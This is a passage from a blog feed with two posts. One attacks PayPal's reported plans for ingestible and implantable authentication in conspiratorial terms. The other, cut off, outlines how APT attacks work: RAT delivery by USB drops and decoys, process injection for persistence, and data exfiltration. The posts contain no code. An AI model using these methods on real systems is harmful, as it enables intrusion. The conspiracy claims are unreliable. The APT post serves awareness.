&lt;b&gt;The Article&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I have read some news which I could not let slip.&amp;nbsp; In fact, I had other Blog entries in production and ready to push into live publishing, but I believe this is more important, so I started on this topic right away.&amp;nbsp; This event will be the start of a huge dystopian life change which the human race will long regret.&lt;br /&gt;
&lt;br /&gt;
On Friday, April 17, 2015, the Wall Street Journal published an article, one of the most life-changing in history.&amp;nbsp; &lt;a href=&quot;http://blogs.wsj.com/digits/2015/04/17/paypal-wants-you-to-inject-your-username-and-eat-your-password/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;A PayPal executive&lt;/a&gt; who works with engineers and developers of PayPal said that &quot;to find and test new technologies, embeddable, injectable, and ingestible devices are the next wave in identification for mobile payments and other sensitive on-line interactions.&quot; Also, the head of PayPal&#39;s and Braintree&#39;s Global Development Advocacy, Jonathan LeBlanc, said that &quot;The future of identification would not rely on passwords.&quot; As we know, PayPal has not only proven in the past to be more secure than traditional forms of on-line payments but has also proven to have certain vulnerabilities which &lt;a href=&quot;http://www.theregister.co.uk/2013/03/12/avast_reseller_breach/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;exposed&lt;/a&gt; its users&#39; usernames and encrypted passwords, and its two-factor authentication techniques were previously &lt;a href=&quot;http://www.slate.com/blogs/future_tense/2014/08/05/paypal_s_two_factor_authentication_is_vulnerable_to_a_hack.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;hacked&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;The Problem - Fear to the Public&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
For these reasons, as well as the fact that passwords (no matter how much encryption they have) are always eventually breakable, PayPal is turning to something more &quot;reliable&quot;, secure and easier to use:&amp;nbsp; &lt;span class=&quot;main-article-info&quot;&gt;Embeddable, Injectable and Ingestible Devices.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcXvgQM1muo-qlM2Q8dgxQ9mPl5i_MSaWqbrLMDjIcqShBrGk-a-E3jZOXN6sUDa0n9qkUbgMYh0tZsM_nBOiD4T1k2IiF2b50rbMuVLB4oDm6TbQTb6f23c3QfUR2ihNtPirT1vd22x95/s1600/robot-job-takeover-robot-human-mind.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcXvgQM1muo-qlM2Q8dgxQ9mPl5i_MSaWqbrLMDjIcqShBrGk-a-E3jZOXN6sUDa0n9qkUbgMYh0tZsM_nBOiD4T1k2IiF2b50rbMuVLB4oDm6TbQTb6f23c3QfUR2ihNtPirT1vd22x95/s1600/robot-job-takeover-robot-human-mind.png&quot; height=&quot;368&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;http://www.makeuseof.com&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;span class=&quot;main-article-info&quot;&gt;&amp;nbsp;As LeBlanc has stated in his &lt;a href=&quot;http://www.slideshare.net/jcleblanc/kill-all-passwords&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;presentations&lt;/a&gt; named &quot;Kill All The Passwords&quot;, presented all over the U.S. and Europe, 91% of people use passwords listed in the top 1000 most used passwords list and 79% in the top 500 respectively.&amp;nbsp; He also added more fear to the fire by stating that the already (relatively) safe algorithms we know now, such as MD5, SHA-1, 2 and 3, have bad security. Additionally, he stated that biometric authentication has a lot of false positives and false negatives, making the authentication process a real pain to use, and that it is not an integrity check which we can easily trust.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;main-article-info&quot;&gt;As the IoT (Internet of Things) merges all the facets of our societal and private lives into a more organized, transparent and traceable public domain, passwords are no longer trusted to &quot;safeguard&quot; our already-on-the-domain identities; therefore, here comes his &quot;solution&quot;.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;main-article-info&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;main-article-info&quot;&gt;&lt;u&gt;&lt;b&gt;LeBlanc Solution&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiav-Fj31ftkPVzZq8uxuat4mVMIfavojsnuRclqZ2UCQAJrUx3aD-SrR3IYvrKzqRDSAhR9hy9luJp7_kXKK0U61VvjkzwsvMZm2JPAXXf8Kuy8G5a2lu1b0DuOIIrllwviaaQiwa-0rXk/s1600/kill-all-passwords-28-638.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiav-Fj31ftkPVzZq8uxuat4mVMIfavojsnuRclqZ2UCQAJrUx3aD-SrR3IYvrKzqRDSAhR9hy9luJp7_kXKK0U61VvjkzwsvMZm2JPAXXf8Kuy8G5a2lu1b0DuOIIrllwviaaQiwa-0rXk/s1600/kill-all-passwords-28-638.jpg&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;http://www.slideshare.net/jcleblanc/kill-all-passwords&lt;/td&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
As any seasoned salesman or social engineer already knows, in order to sell a product or convince someone to do a certain thing (a thing he wants you to do), he first has to create the need for it. One of the techniques used to accomplish this is to create fear. Once the fear and the need are established, the solution comes next.&amp;nbsp; LeBlanc states his solution to authentication by using:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; -Fingerprint Scanning&lt;br /&gt;
&amp;nbsp; -Vein Recognition&lt;br /&gt;
&amp;nbsp; -Heart rate monitoring&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;By the following methods:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; -Ingestible Technology: Ingestible capsules will be used and powered by stomach acids to detect glucose, blood pressure, digestive health and &lt;span class=&quot;main-article-info&quot;&gt;other unique internal parameter &lt;/span&gt;patterns.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; -Brain-Chip Implants will be used (through &lt;span class=&quot;main-article-info&quot;&gt;built-in ECG sensors) to monitor the unique electrical activity of a person’s heart, and communicate via &quot;wireless wearable computer tattoos.&quot; &lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwa5-YfbVjgp2HWGog1o5_bgMTqG3droPmqKX9nzZhN9SnZWURHKh49dLjhsNRNV_nrUWb84H-h79RAI1MTBYEqU8m4uqjhtjK1I4mIKxBP0pYCfwJef6b9WhIBibfFyhHDUEpi5Kirt4J/s1600/kill-all-passwords-24-638.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwa5-YfbVjgp2HWGog1o5_bgMTqG3droPmqKX9nzZhN9SnZWURHKh49dLjhsNRNV_nrUWb84H-h79RAI1MTBYEqU8m4uqjhtjK1I4mIKxBP0pYCfwJef6b9WhIBibfFyhHDUEpi5Kirt4J/s1600/kill-all-passwords-24-638.jpg&quot; height=&quot;480&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;http://www.slideshare.net/jcleblanc/kill-all-passwords&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
LeBlanc states that these methods will be &quot;natural body identification&quot;, which we already know will not be true, because a machine (bits and bytes) will be required to analyze body patterns, which does not make it 100% natural.&amp;nbsp; Think about the false positives caused by our body&#39;s reactions to drugs, anomalies, sickness, and unexplained pattern behaviors.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;FIDO Alliance&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
PayPal has partnered with the FIDO Alliance to incorporate better authentication systems for their users.&amp;nbsp; One of their projects is Universal 2nd Factor (U2F) authentication. As the FIDO Alliance states in one of its videos, U2F offers a more &quot;open, secure and easy to use standard by using a public and private key pair.&quot; The Bluetooth USB-like adapter device will not require drivers and will be used as a second method of authentication (after inputting the password); it will be the intermediary between the browser and the user to prevent keylogging, phishing (the weakest link) and MitM (man-in-the-middle) attacks.&amp;nbsp; It will also be used with mobile devices, where, with Duo Push as an integral part, it will be used as a phone app.&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ34ACSMcnfzQ7vOG4PUJS6OAkI9B7977jKLsPpM12DuntY0hA_vAISCwzzTa8dvFltFy6_lmggpQ_wwtWrMsEFEvtMzlGuur1Y0V43_IWnmhorCsbH3vi10lv5VZIj8Sgmhx8ChuvRYu0/s1600/graphic_FIDOExperience_SM.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ34ACSMcnfzQ7vOG4PUJS6OAkI9B7977jKLsPpM12DuntY0hA_vAISCwzzTa8dvFltFy6_lmggpQ_wwtWrMsEFEvtMzlGuur1Y0V43_IWnmhorCsbH3vi10lv5VZIj8Sgmhx8ChuvRYu0/s1600/graphic_FIDOExperience_SM.png&quot; height=&quot;174&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;https://fidoalliance.org/about/overview&lt;/td&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
In my opinion, this will be the bridge and the temporary solution for PayPal before they go full speed with the new and so radical change which will change our lives forever.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;Final Thoughts&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
We are now living in a very crucial time when the fight for privacy, human rights, wars, terrorist attacks made through false flag operations and our form of communication as well as authentication will be playing a huge new role and change to a more dystopian reality which will be combined with our &quot;own form of control&quot; by using our own medical record, health situation and body parts to keep our private data, the data that never had to be released to the public domain, secure.&amp;nbsp; It is now the time to change our dormant state and fight for our human rights, which is the last thing we have left.&amp;nbsp; If we don&#39;t do anything, one day our future grandchildren will look at the past (if not altered) and ask: what has happened with our humanity?&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiGDJFz8cK0dWiYNtIaB-vPVUpLjioPI2N1XVu9kbbF0UhE8kJLkcFidHk_DS-FIC6UegO8qAFdxmMghcQ_IV8IM8jTPSYTDvMe2T4nF5cD-YgpykoDUVOjCs4KH0rYJYuNaTbi_xZM0kL/s1600/MachineCity_rev.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiGDJFz8cK0dWiYNtIaB-vPVUpLjioPI2N1XVu9kbbF0UhE8kJLkcFidHk_DS-FIC6UegO8qAFdxmMghcQ_IV8IM8jTPSYTDvMe2T4nF5cD-YgpykoDUVOjCs4KH0rYJYuNaTbi_xZM0kL/s1600/MachineCity_rev.jpg&quot; height=&quot;308&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&lt;b&gt;&lt;u&gt;Sources&lt;/u&gt;&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Wall Street Journal Article:&amp;nbsp; http://blogs.wsj.com/digits/2015/04/17/paypal-wants-you-to-inject-your-username-and-eat-your-password&lt;br /&gt;
&lt;br /&gt;
LeBlanc Presentation:&amp;nbsp; http://www.slideshare.net/jcleblanc/kill-all-passwords&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
FIDO Alliance: https://fidoalliance.org/news-more/videos/&lt;br /&gt;
&lt;br /&gt;
PayPal FIDO:&amp;nbsp; https://www.paypal-pages.com/samsunggalaxys5/us/index-faq.html</description><link>https://unsecuritynow.blogspot.com/2015/04/new-world-order-paypal.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZpY05nehf1Dh75hZR0kuCBZ1BP0eL70Ar79_GjwyAZU0pqs4v5znvAdA8RaJwliPqXusPdRtxP7RjDFIlXRqF-kQ-c9xHi02PIu4bvQD6kDnDN-2QYTJ8iW1_3Tz3ZzgOz1BMQLNH9ul7/s72-c/666-chip.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-3592933774392553144</guid><pubDate>Fri, 03 Apr 2015 17:01:00 +0000</pubDate><atom:updated>2015-04-19T12:08:29.405-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">access</category><category domain="http://www.blogger.com/atom/ns#">advanced</category><category domain="http://www.blogger.com/atom/ns#">APT</category><category domain="http://www.blogger.com/atom/ns#">backdoor</category><category domain="http://www.blogger.com/atom/ns#">censor</category><category domain="http://www.blogger.com/atom/ns#">cyberwar</category><category domain="http://www.blogger.com/atom/ns#">exfiltration</category><category domain="http://www.blogger.com/atom/ns#">infrastructure</category><category domain="http://www.blogger.com/atom/ns#">internet</category><category domain="http://www.blogger.com/atom/ns#">malware</category><category domain="http://www.blogger.com/atom/ns#">persistent</category><category domain="http://www.blogger.com/atom/ns#">privacy</category><category domain="http://www.blogger.com/atom/ns#">radar</category><category domain="http://www.blogger.com/atom/ns#">scada</category><category domain="http://www.blogger.com/atom/ns#">server</category><category domain="http://www.blogger.com/atom/ns#">target</category><category domain="http://www.blogger.com/atom/ns#">threats</category><category 
domain="http://www.blogger.com/atom/ns#">trojan</category><category domain="http://www.blogger.com/atom/ns#">vulnerability</category><title>The Evolution of Hacking: Advanced Persistent Threats (APT)</title><description>&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnT_lCnlUrM9zJZOoJuxWrFCkahiFk_IH8lab_bkt5ch8HuVsTz6joFmQfEs259ToooxQ4HuqUgRZ3c3sPjb1Apm-JPHMueAxNWYzv7OQqRujq375YJKNrtv66Sg8DLqpFmEzNTWe9EUHU/s1600/ISACA-APT01.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnT_lCnlUrM9zJZOoJuxWrFCkahiFk_IH8lab_bkt5ch8HuVsTz6joFmQfEs259ToooxQ4HuqUgRZ3c3sPjb1Apm-JPHMueAxNWYzv7OQqRujq375YJKNrtv66Sg8DLqpFmEzNTWe9EUHU/s1600/ISACA-APT01.jpg&quot; height=&quot;438&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;&lt;span class=&quot;_r3&quot;&gt;&lt;span class=&quot;irc_ho&quot; dir=&quot;ltr&quot;&gt;www.itbusinessedge.com&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;_r3 irc_msc&quot;&gt;&lt;span class=&quot;irc_idim&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&amp;nbsp;&lt;u&gt;&lt;b&gt;Introduction&lt;/b&gt;&lt;/u&gt; &lt;br /&gt;
&lt;br /&gt;
In the last couple of decades we have observed some of the most brilliant hacking techniques ever known. We also delved into a lot of sophisticated malware which redefined the whole concept of security. As the tools are made simpler and simpler and more people adapt to the whole security world, we have seen substantial growth not only in sophistication but also in persistence.&amp;nbsp; The result: APTs.&lt;br /&gt;
&lt;br /&gt;
Nowadays, we are not only fighting against malicious and curious hungry people who want our data, identity and financial information but also against governments, mafias, and &quot;terrorist&quot; nations seeking to gain trade and national secrets.&amp;nbsp; As this world might be coming to an imminent end (the end of humanity), it is logical to think that more and more havoc will be caused in our lives and, in order to survive, we will have to accept a New World government, where everything will be monitored, judged, moderated and executed within one World Organization, justified as total security and safety for all humanity.&lt;br /&gt;
&lt;br /&gt;
As more havoc is being done in this society, so it happens in our digital world. Better autonomic, resilient and cognitive systems are also put into the market (and our society) and into the hands of the gifted ones (and malicious users), providing this society with more advanced, smart ways to silently break into the most sophisticated and secure systems. An Advanced Persistent Threat is defined as &quot;&lt;span class=&quot;_Tgc&quot;&gt;a set of stealthy and continuous computer hacking processes, often orchestrated by human(s) targeting a specific entity.&quot; By dissecting each word, we get a better idea of what an APT really is:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Advanced - Multi-vector 0 day attacks.&lt;br /&gt;
&lt;br /&gt;
Persistent - Undetectable attacks over a long period of time.&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;Threat - Menace to sensitive information, critical infrastructure and assets.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;u&gt;&lt;b&gt;Past Examples&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Below are only a handful of APT examples:&lt;br /&gt;
&lt;br /&gt;
PoisonIvy&lt;br /&gt;
Stuxnet&lt;br /&gt;
NightDragon&lt;br /&gt;
GhostNet &lt;br /&gt;
Lurid&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Past Targets&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Moonlight Maze (1998)&lt;br /&gt;
Titan Rain (2003)&lt;br /&gt;
US Congressmen (2006)&lt;br /&gt;
Oak Ridge National Laboratory (2007)&lt;br /&gt;
Los Alamos National Laboratory (2007)&lt;br /&gt;
US Department of Defense (2008)&lt;br /&gt;
Office of His Holiness the Dalai Lama (2008)&lt;br /&gt;
Operation Aurora (2009)&lt;br /&gt;
Australian Resource Sector (2010)&lt;br /&gt;
French Government (2010)&lt;br /&gt;
Canadian Government (2011) &lt;br /&gt;
Australian Government (2011)&lt;br /&gt;
Comodo Affiliated Root Authority (2011)&lt;br /&gt;
RSA (2011)&lt;br /&gt;
Oak Ridge National Laboratory (2011)&lt;br /&gt;
L-3 Communications (2011)&lt;br /&gt;
Lockheed Martin (2011)&lt;br /&gt;
Northrop Grumman (2011)&lt;br /&gt;
International Monetary Fund (2011)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;u&gt;&lt;b&gt;How APT Works&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUhRSkkwvUm7NB4P3vzYnep-Zlxjjn9hWFHi7PxGnRb2xeIsmJAljrkxh1YXb33SfgvBOkStIWewrSYCKQLTw_shOyADzfY2kYEsjCob6rX21VNOlRd86Gkcx2wZXoBut9aKoyqXwPWryd/s1600/apt-lifecycle.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUhRSkkwvUm7NB4P3vzYnep-Zlxjjn9hWFHi7PxGnRb2xeIsmJAljrkxh1YXb33SfgvBOkStIWewrSYCKQLTw_shOyADzfY2kYEsjCob6rX21VNOlRd86Gkcx2wZXoBut9aKoyqXwPWryd/s1600/apt-lifecycle.png&quot; height=&quot;457&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;_Tgc&quot;&gt;First, it is important to identify the phases of a successful APT.&amp;nbsp; In order to successfully attack a system without being detected, a series of sophisticated, under-the-radar techniques must be used.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;u&gt;&lt;b&gt;First Step - Advanced (Infection)&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;The attack is conducted by sending the RAT&#39;s Trojan (server file) and tricking the user into running it.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;Delivery methods include attachments, or a visit to a website where the malicious user has taken advantage of a vulnerability so that the RAT&#39;s Trojan is downloaded.&amp;nbsp; An indirect and less suspicious method is simply throwing a USB drive with the RAT&#39;s Trojan software into the target&#39;s backyard, car, or a personal item such as his coat or pants pocket.&amp;nbsp; If he plugs it in, thinking he luckily found a USB drive he can use, an auto-executable crafted by the malicious user executes the RAT&#39;s Trojan software in the background.&amp;nbsp; The malicious user can put random school documents or home-made pictures (not his own) on the drive to make it less suspicious.&amp;nbsp; A more advanced alternative is for the malicious user to craft malicious software which &lt;/span&gt;&lt;span class=&quot;_Tgc&quot;&gt;&lt;span class=&quot;_Tgc&quot;&gt;downloads the server file (RAT&#39;s Trojan) when &lt;/span&gt;inactivity is detected on the target&#39;s machine, so the target doesn&#39;t notice a change in system performance or other hints while the connection, download and auto-execution are taking place.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;/span&gt;&lt;span class=&quot;_Tgc&quot;&gt;&lt;span class=&quot;_Tgc&quot;&gt;Once the victim is infected, the attacker can manage the victim&#39;s PC through the Remote Administration Tool (the RAT).&lt;/span&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;When the victim is infected, it simply notifies the malicious user who is running the RAT on his end.&amp;nbsp; Then, the malicious user can conduct a series of activities:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Keylogging (logs every single keystroke)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Uploads and downloads system&#39;s files &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Unrestricted remote shell login&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Uses proxy services to hide attacker&#39;s identity (through HTTP/SOCKS)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Kills, lists and starts system processes&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Spies on victim&#39;s webcam&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Screen Captures &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Full administrative access to files and system&#39;s registry &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Used to send SPAM from the victim&#39;s machine&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Logs off, restarts and shuts down the victim&#39;s computer&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Update the RAT&#39;s server (trojan) on the victim&#39;s machine &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Uninstallation of RAT itself&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;span class=&quot;_Tgc&quot;&gt;&lt;span class=&quot;_Tgc&quot;&gt;&lt;u&gt;&lt;b&gt;Second Step - Persistent (Methods)&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;The persistent phase comes when the attacker conducts stealthy activities such as:&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Updating the server file &lt;/span&gt;&lt;span class=&quot;_Tgc&quot;&gt;on the victim&#39;s machine so it doesn&#39;t get detected by anti-malware&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Injecting the server file into a specific system process, e.g. winlogon.exe, iexplore.exe or rundll32.exe.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -The server file&#39;s shortcut image can be changed as well as the name of the file to avoid detection.&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Auto-runs and connects to attacker if the server&#39;s injected service is killed&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;u&gt;&lt;b&gt;Third Step - Threat (Exfiltration)&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;This serious threat can be used for nefarious exfiltration of mass data, such as:&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&lt;u&gt;&lt;b&gt; &lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Network footprinting&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Assets enumeration&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Usernames and Passwords&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Administrative domain account creation for further access&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;_Tgc&quot;&gt;&amp;nbsp; -Plant backdoors for evasion&lt;/span&gt;&lt;br /&gt;
